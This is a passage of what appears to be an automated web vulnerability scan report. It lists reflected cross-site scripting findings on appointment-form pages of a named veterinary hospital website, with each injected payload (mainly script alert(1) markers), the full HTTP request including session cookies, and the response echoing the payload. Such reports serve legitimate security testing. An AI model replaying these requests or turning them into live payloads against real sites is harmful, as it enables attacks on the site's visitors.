HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:46:02 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21645 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/manhattan-veterinary-group/appt.html?7c5c9"><script>alert(1)</script>49734066e86 =1" />...[SNIP]...
2.86. http://www.vcahospitals.com/marshfield/appt.html [REST URL parameter 2]
Summary
Severity: High
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /marshfield/appt.html
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21aa2"><a>e74c5ada644 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /marshfield/appt.html21aa2"><a>e74c5ada644 HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.vcahospitals.com/marshfield Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Mar 2011 12:47:36 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 Not Found Content-Type: text/html Content-Length: 9903 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <body id="appt21aa2"><a>e74c5ada644 ">...[SNIP]...
2.87. http://www.vcahospitals.com/marshfield/appt.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /marshfield/appt.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd2e3"><script>alert(1)</script>47355e93e99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /marshfield/appt.html?fd2e3"><script>alert(1)</script>47355e93e99 =1 HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.vcahospitals.com/marshfield Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:15 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21660 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/marshfield/appt.html?fd2e3"><script>alert(1)</script>47355e93e99 =1" />...[SNIP]...
2.88. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [REST URL parameter 2]
Summary
Severity: High
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ea8b"><a>f918a068f09 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /new-york-veterinary-hospital/appt.html5ea8b"><a>f918a068f09 HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Mar 2011 12:46:43 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 Not Found Content-Type: text/html Content-Length: 9657 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <body id="appt5ea8b"><a>f918a068f09 ">...[SNIP]...
2.89. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [altphone parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the altphone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9ac2"><script>alert(1)</script>30c7bc9b5b5 was submitted in the altphone parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=d9ac2"><script>alert(1)</script>30c7bc9b5b5 &m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526email%25253d%252526fname%25253d%252526g
uid%25253d%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcurrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dMozilla%25252f4.0%252b(compatible%252
53b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)% HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:46:07 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=o863b4qroqo4ij6djcsf0v35n1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 25541 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input name="altphone" id="altphone" type="text" size="30" maxlength="20" value="d9ac2"><script>alert(1)</script>30c7bc9b5b5 " />...[SNIP]...
2.90. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ampm1 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the ampm1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46150"><script>alert(1)</script>eaeb03d5426 was submitted in the ampm1 parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM46150"><script>alert(1)</script>eaeb03d5426 &m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526email%25253d%252526fname%25253d%252526g
uid%25253d%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcurrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dMozilla%25252f4.0%252b(compatible%252
53b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)% HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:12 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=t5ueh83st72q06n8bhh94jq2i1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&m1=AM46150"><script>alert(1)</script>eaeb03d5426 &m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source...[SNIP]...
2.91. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ampm2 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the ampm2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c93b"><script>alert(1)</script>6aa43ad2da9 was submitted in the ampm2 parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM9c93b"><script>alert(1)</script>6aa43ad2da9 &m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526email%25253d%252526fname%25253d%252526g
uid%25253d%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcurrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dMozilla%25252f4.0%252b(compatible%252
53b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)% HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:17 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=a4vbafvn3edv5idqhqabu1vbf4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM9c93b"><script>alert(1)</script>6aa43ad2da9 &m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york...[SNIP]...
2.92. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ampm3 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The value of the ampm3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d75d4"><script>alert(1)</script>ec5002bcf17 was submitted in the ampm3 parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AMd75d4"><script>alert(1)</script>ec5002bcf17 &appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1
